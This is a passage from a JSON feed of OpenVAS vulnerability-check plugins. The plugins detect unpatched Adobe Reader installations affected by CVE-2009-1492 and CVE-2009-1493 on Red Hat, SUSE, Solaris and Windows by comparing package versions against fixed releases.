http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0478.html\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb09-06.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~2\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread-plugin\", rpm:\"acroread-plugin~8.1.5~2\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread-plugin\", rpm:\"acroread-plugin~8.1.5~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread-plugin\", rpm:\"acroread-plugin~8.1.5~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:33", "bulletinFamily": "scanner", "description": "Check for the Version of Adobe Acrobat Reader", "modified": "2018-04-06T00:00:00", 
"published": "2009-10-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855744", "id": "OPENVAS:1361412562310855744", "type": "openvas", "title": "Solaris Update for Adobe Acrobat Reader 121104-10", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Adobe Acrobat Reader 121104-10\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Adobe Acrobat Reader on solaris_5.10_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Adobe Acrobat Reader\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855744\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n 
script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"121104-10\");\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_name(\"Solaris Update for Adobe Acrobat Reader 121104-10\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-121104-10-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Adobe Acrobat Reader\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"121104-10\", package:\"SUNWacroread\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:06", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:027.", "modified": "2018-04-06T00:00:00", "published": "2009-05-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064040", "id": "OPENVAS:136141256231064040", "title": "SuSE Security Advisory SUSE-SA:2009:027 (acroread)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_027.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:027 
(acroread)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Adobe Acrobat Reader acroread received fixes for two\nvulnerabilities in the JavaScript API that allowed attackers\nto execute arbitrary code with a malformed PDF file.\n\n(CVE-2009-1492,CVE-2009-1493)\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:027\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:027.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64040\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-25 20:59:33 +0200 (Mon, 25 May 2009)\");\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:027 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:10", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:027.", "modified": "2017-07-11T00:00:00", "published": "2009-05-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64040", "id": "OPENVAS:64040", "title": "SuSE Security Advisory SUSE-SA:2009:027 (acroread)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_027.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:027 (acroread)\n#\n# Authors:\n# Thomas 
Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Adobe Acrobat Reader acroread received fixes for two\nvulnerabilities in the JavaScript API that allowed attackers\nto execute arbitrary code with a malformed PDF file.\n\n(CVE-2009-1492,CVE-2009-1493)\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:027\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:027.\";\n\n \n\nif(description)\n{\n script_id(64040);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-25 20:59:33 +0200 (Mon, 25 May 2009)\");\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security 
Advisory SUSE-SA:2009:027 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:55", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0478.\n\nAdobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader to\ncrash or, potentially, execute arbitrary code as the user running Adobe\nReader. (CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 8.1.5, which is not vulnerable to these issues. 
All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.", "modified": "2018-04-06T00:00:00", "published": "2009-05-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063973", "id": "OPENVAS:136141256231063973", "title": "RedHat Security Advisory RHSA-2009:0478", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0478.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0478 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0478.\n\nAdobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader to\ncrash or, potentially, execute arbitrary code as the user running Adobe\nReader. 
(CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 8.1.5, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63973\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-20 00:17:15 +0200 (Wed, 20 May 2009)\");\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0478\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0478.html\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb09-06.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~2\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread-plugin\", rpm:\"acroread-plugin~8.1.5~2\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread-plugin\", rpm:\"acroread-plugin~8.1.5~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.5~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread-plugin\", rpm:\"acroread-plugin~8.1.5~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-04T13:43:45", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader/Acrobat and is prone to Denial of\n Service 
vulnerability.", "modified": "2018-12-03T00:00:00", "published": "2009-05-11T00:00:00", "id": "OPENVAS:1361412562310800706", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800706", "title": "Adobe Reader/Acrobat Denial of Service Vulnerability (May09)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_dos_vuln_may09_win.nasl 12629 2018-12-03 15:19:43Z cfischer $\n#\n# Adobe Reader/Acrobat Denial of Service Vulnerability (May09) (Windows)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800706\");\n script_version(\"$Revision: 12629 $\");\n script_cve_id(\"CVE-2009-1492\");\n script_bugtraq_id(34736);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-03 16:19:43 +0100 (Mon, 03 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-11 08:41:11 +0200 (Mon, 11 May 2009)\");\n script_name(\"Adobe Reader/Acrobat Denial of Service Vulnerability (May09)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader/Acrobat and is prone to Denial of\n Service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This flaw is due to memory corruption error in 'getAnnots' methods in the\n JavaScript API while processing malicious PDF files that calls this vulnerable\n method with crafted integer arguments.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker cause memory corruption or\n denial of service.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader/Acrobat version 9.1 and prior on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader/Acrobat version 9.3.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/34924\");\n script_xref(name:\"URL\", 
value:\"http://xforce.iss.net/xforce/xfdb/50145\");\n script_xref(name:\"URL\", value:\"http://blogs.adobe.com/psirt/2009/04/update_on_adobe_reader_issue.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(readerVer = get_app_version(cpe:CPE, nofork:TRUE))\n{\n if(version_is_less_equal(version:readerVer, test_version:\"9.1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\nCPE = \"cpe:/a:adobe:acrobat\";\nif(acroVer = get_app_version(cpe:CPE))\n{\n if(version_is_less_equal(version:acroVer, test_version:\"9.1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:50", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to arbitrary\n code execution vulnerability.", "modified": "2017-12-21T00:00:00", "published": "2010-04-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=801303", "id": "OPENVAS:801303", "title": "Adobe Reader PDF Handling Code Execution Vulnerability (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_exe_code_exec_vuln_win.nasl 8210 2017-12-21 10:26:31Z cfischer $\n#\n# Adobe Reader PDF Handling Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\ntag_impact = \"Successful exploitation will allow attacker to execute arbitrary code via\n a crafted document.\n\n Impact level: System/Application.\";\n\ntag_affected = \"Adobe Reader version 8.x and 9.x on Windows.\";\n\ntag_insight = \"The flaw is due to error in handling 'PDF' files, which allows to execute\n 'EXE' files that are embedded in a PDF document.\";\n\ntag_solution = \"Upgrade to Adobe Reader version 9.3.2 or later,\n For further updates refer, http://www.adobe.com\";\n\ntag_summary = \"This host is installed with Adobe Reader and is prone to arbitrary\n code execution vulnerability.\";\n\nif(description)\n{\n script_id(801303);\n script_version(\"$Revision: 8210 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 11:26:31 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-07 16:20:50 +0200 (Wed, 07 Apr 2010)\");\n script_cve_id(\"CVE-2009-1492\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Reader PDF Handling Code Execution Vulnerability (Windows)\");\n script_xref(name : \"URL\" , 
value : \"http://lists.immunitysec.com/pipermail/dailydave/2010-April/006074.html\");\n script_xref(name : \"URL\" , value : \"http://lists.immunitysec.com/pipermail/dailydave/2010-April/006072.html\");\n script_xref(name : \"URL\" , value : \"https://forum.immunityinc.com/board/thread/1199/exploiting-pdf-files-without-vulnerabili/?page=1#post-1199\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Installed\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version:vers, test_version:\"9.3.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"9.3.2\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-05T13:46:28", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to arbitrary\n code execution vulnerability.", "modified": "2018-12-04T00:00:00", "published": "2010-04-07T00:00:00", "id": "OPENVAS:1361412562310801303", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801303", "title": "Adobe Reader PDF Handling Code Execution Vulnerability (Windows)", 
"type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_exe_code_exec_vuln_win.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Adobe Reader PDF Handling Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801303\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-07 16:20:50 +0200 (Wed, 07 Apr 2010)\");\n script_cve_id(\"CVE-2009-1492\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Reader PDF Handling Code Execution Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://lists.immunitysec.com/pipermail/dailydave/2010-April/006074.html\");\n script_xref(name:\"URL\", 
value:\"http://lists.immunitysec.com/pipermail/dailydave/2010-April/006072.html\");\n script_xref(name:\"URL\", value:\"https://forum.immunityinc.com/board/thread/1199/exploiting-pdf-files-without-vulnerabili/?page=1#post-1199\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Installed\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader version 8.x and 9.x on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to error in handling 'PDF' files, which allows to execute\n 'EXE' files that are embedded in a PDF document.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader version 9.3.2 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to arbitrary\n code execution vulnerability.\");\n\n 